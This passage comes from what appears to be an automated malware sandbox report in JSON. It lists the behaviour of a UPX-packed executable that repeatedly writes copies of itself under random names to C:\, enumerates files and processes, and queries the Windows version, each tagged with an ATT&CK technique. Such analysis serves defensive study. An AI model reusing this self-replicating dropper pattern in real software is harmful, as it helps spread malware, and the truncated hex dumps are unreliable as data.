140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e00c0301e00bb301e00000000000000000000001600000000011ce312000000000080f0120095e1aa77c6541700feffffff435cae775059ae77aa000000b8000000ba301e00b8301e00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cad7760d89c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edae77e2301e00a06a847586000000a4e41200dce812000000000086008800a06a8475a4e41200916c8475e2301e00a06a8475a06a847514e9120002020000 (UID: 00000000-00004124)\n \"802862.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004124)\n \"824686.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002600d8302600d3302600000000000000000000001e00000000011ce312000000000080f0120095e1aa77cf5b1700feffffff435cae775059ae77aa000000b8000000d2302600d0302600a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cad7760d89c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edae77fa302600a06a847586000000a4e41200dce812000000000086008800a06a8475a4e41200916c8475fa302600a06a8475a06a847514e9120002020000 (UID: 00000000-00004400)\n \"824686.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004400)\n \"0228060.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004128)\n \"0228060.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002c0038c42c0033c42c00000000000000000000002500000000011ce312000000000080f0120095e1aa77c95a1700feffffff435cae775059ae77aa000000b800000032c42c0030c42c00a4e41200dce81200000000000000000000000000000000000000000000000000001a0000000025001c5cad7760d89c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edae775ac42c00a06a847586000000a4e41200dce812000000000086008800a06a8475a4e41200916c84755ac42c00a06a8475a06a847514e9120002020000 (UID: 00000000-00004128)\n \"0228060.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004128)\n \"4404242.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006140)\n \"4404242.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006a00b8306a00b3306a00000000000000000000006200000000011ce312000000000080f0120095e1aa77515f1700feffffff435cae775059ae77aa000000b8000000b2306a00b0306a00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000062001c5cad7760d89c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edae77da306a00a06a847586000000a4e41200dce812000000000086008800a06a8475a4e41200916c8475da306a00a06a8475a06a847514e9120002020000 (UID: 00000000-00006140)\n \"4404242.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006140)\n \"dvrdf.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100102a21000b2a2100000000000000000000001900000000011ce312000000000080f0120095e1aa7744401700feffffff435cae775059ae77aa000000b80000000a2a2100082a2100a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cad7760d89c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edae77322a2100a06a847586000000a4e41200dce812000000000086008800a06a8475a4e41200916c8475322a2100a06a8475a06a847514e9120002020000 (UID: 00000000-00004308)\n \"dvrdf.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004308)\n \"nrdphjv.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004324)\n \"nrdphjv.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002200c06e2200bb6e2200000000000000000000001a00000000011ce312000000000080f0120095e1aa77ca461700feffffff435cae775059ae77aa000000b8000000ba6e2200b86e2200a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cad7760d89c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edae77e26e2200a06a847586000000a4e41200dce812000000000086008800a06a8475a4e41200916c8475e26e2200a06a8475a06a847514e9120002020000 (UID: 00000000-00004324)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter 4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter dhxhp.exe (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00005920)\n \"dhxhp.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005988)\n \"dhxhp.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005988)\n \"dhxhp.exe\" called \"FindNextFileW\" with parameter 4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe (UID: 00000000-00005988)\n \"dhxhp.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005988)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dhxhp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lnvjpll.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"0228060.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"4404242.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nrdphjv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rpbpdxh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"408802.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"848862.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"22202.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lvlfrln.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6248060.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"086880.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"66206.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"0488840.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"bnrrj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"288226.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"08246.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dhfjp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dvlplh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"206020.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8204220.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"04620.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"bjjnnr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"tfvnr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" has an entrypoint in section \"UPX1\"\n \"2824064.exe\" has an entrypoint in section \"UPX1\"\n \"686826.exe\" has an entrypoint in section \"UPX1\"\n \"4460482.exe\" has an entrypoint in section \"UPX1\"\n \"60026.exe\" has an entrypoint in section \"UPX1\"\n \"0628066.exe\" has an entrypoint in section \"UPX1\"\n \"422622.exe\" has an entrypoint in section \"UPX1\"\n \"4284246.exe\" has an entrypoint in section \"UPX1\"\n \"xdfpfx.exe\" has an entrypoint in section \"UPX1\"\n \"rhvphd.exe\" has an entrypoint in section \"UPX1\"\n \"xltnrpf.exe\" has an entrypoint in section \"UPX1\"\n \"vlrlrxl.exe\" has an entrypoint in section \"UPX1\"\n \"bdjjvlh.exe\" has an entrypoint in section \"UPX1\"\n \"4060084.exe\" has an entrypoint in section \"UPX1\"\n \"084822.exe\" has an entrypoint in section \"UPX1\"\n \"jhftx.exe\" has an entrypoint in section \"UPX1\"\n \"4602048.exe\" has an entrypoint in section \"UPX1\"\n \"822462.exe\" has an entrypoint in section \"UPX1\"\n \"8024206.exe\" has an entrypoint in section \"UPX1\"\n \"664222.exe\" has an entrypoint in section \"UPX1\"\n \"6264048.exe\" has an entrypoint in section \"UPX1\"\n \"666086.exe\" has an entrypoint in section \"UPX1\"\n \"thbfpv.exe\" has an entrypoint in section \"UPX1\"\n \"ttnbl.exe\" has an entrypoint in section \"UPX1\"\n \"ptfff.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" wrote 14483 bytes starting with PE header signature to file \"C:\\dhxhp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dhxhp.exe\" wrote 14495 bytes starting with PE header signature to file \"C:\\lnvjpll.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lnvjpll.exe\" wrote 14506 bytes starting with PE header signature to file \"C:\\0020002.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0020002.exe\" wrote 14522 bytes starting with PE header signature to file \"C:\\802862.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"802862.exe\" wrote 14535 bytes starting with PE header signature to file \"C:\\824686.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"824686.exe\" wrote 14548 bytes starting with PE header signature to file \"C:\\0228060.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0228060.exe\" wrote 14567 bytes starting with PE header signature to file \"C:\\4404242.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4404242.exe\" wrote 14577 bytes starting with PE header signature to file \"C:\\dvrdf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dvrdf.exe\" wrote 14592 bytes starting with PE header signature to file \"C:\\nrdphjv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nrdphjv.exe\" wrote 14605 bytes starting with PE header signature to file \"C:\\rpbpdxh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rpbpdxh.exe\" wrote 14623 bytes starting with PE header signature to file \"C:\\408802.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"408802.exe\" wrote 14636 bytes starting with PE header signature to file \"C:\\6644862.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6644862.exe\" wrote 14648 bytes starting with PE header signature to file \"C:\\848862.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"848862.exe\" wrote 14660 bytes starting with PE header signature to file \"C:\\22202.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"22202.exe\" wrote 14675 bytes starting with PE header signature to file \"C:\\lvlfrln.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lvlfrln.exe\" wrote 14686 bytes starting with PE header signature to file \"C:\\vrdnrx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vrdnrx.exe\" wrote 14701 bytes starting with PE header signature to file \"C:\\6248060.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6248060.exe\" wrote 14721 bytes starting with PE header signature to file \"C:\\062080.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"062080.exe\" wrote 14738 bytes starting with PE header signature to file \"C:\\086880.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"086880.exe\" wrote 14753 bytes starting with PE header signature to file \"C:\\4424228.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4424228.exe\" wrote 14773 bytes starting with PE header signature to file \"C:\\42866.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"42866.exe\" wrote 14788 bytes starting with PE header signature to file \"C:\\600468.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"600468.exe\" wrote 14804 bytes starting with PE header signature to file \"C:\\66206.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"66206.exe\" wrote 14814 bytes starting with PE header signature to file \"C:\\280282.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"280282.exe\" wrote 14830 bytes starting with PE header signature to file \"C:\\0488840.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0488840.exe\" wrote 14850 bytes starting with PE header signature to file \"C:\\ptvbh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ptvbh.exe\" wrote 14861 bytes starting with PE header signature to file \"C:\\bnrrj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bnrrj.exe\" wrote 14876 bytes starting with PE header signature to file \"C:\\6620064.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6620064.exe\" wrote 14887 bytes starting with PE header signature to file \"C:\\288226.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"288226.exe\" wrote 14904 bytes starting with PE header signature to file \"C:\\08246.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"08246.exe\" wrote 14916 bytes starting with PE header signature to file \"C:\\dhfjp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dhfjp.exe\" wrote 14934 bytes starting with PE header signature to file \"C:\\jxbtp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jxbtp.exe\" wrote 14947 bytes starting with PE header signature to file \"C:\\dvlplh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dvlplh.exe\" wrote 14966 bytes starting with PE header signature to file \"C:\\nvlntp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nvlntp.exe\" wrote 14980 bytes starting with PE header signature to file \"C:\\848682.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"848682.exe\" wrote 14994 bytes starting with PE header signature to file \"C:\\206020.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"206020.exe\" wrote 15008 bytes starting with PE header signature to file \"C:\\220440.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"220440.exe\" wrote 15019 bytes starting with PE header signature to file \"C:\\8204220.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8204220.exe\" wrote 15033 bytes starting with PE header signature to file \"C:\\04620.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"04620.exe\" wrote 15045 bytes starting with PE header signature to file \"C:\\620206.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"620206.exe\" wrote 15058 bytes starting with PE header signature to file \"C:\\dvfrj.exe\": 